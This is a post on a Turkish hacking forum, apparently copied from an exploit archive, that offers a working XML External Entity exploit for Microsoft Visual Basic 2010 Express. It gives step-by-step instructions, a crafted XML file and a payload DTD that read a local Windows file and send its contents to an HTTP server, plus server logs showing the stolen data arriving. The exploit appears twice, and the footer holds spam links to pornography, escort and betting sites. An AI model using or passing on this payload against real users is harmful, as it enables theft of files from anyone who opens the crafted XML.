[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit

#1
Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit

Kod:
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -


Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt

# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -

#  0day.today [2019-12-04]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Wordpress Powie WHOIS Domain Check 0.9.31 Plugin Exploit 0bir 1 13 07-10-2020, 06:53 AM
Son Mesaj: drjacob
  Online Shopping Portal 3.1 - (email) SQL Injection Vulnerability 0bir 0 7 07-09-2020, 10:45 PM
Son Mesaj: 0bir
  Sickbeard 0.1 - Remote Command Injection Exploit 0bir 0 4 07-09-2020, 10:44 PM
Son Mesaj: 0bir
  rauLink Software Domotica Web 2.0 SQL Injection Vulnerability 0bir 0 6 07-09-2020, 10:43 PM
Son Mesaj: 0bir
  rauLink Software Domotica Web 2.0 SQL Injection Vulnerability 0bir 0 3 07-09-2020, 10:43 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort En iyi bahis siteleri porno beylikdüzü escort avcılar escort eskişehir escort porno cami halısı taksim escort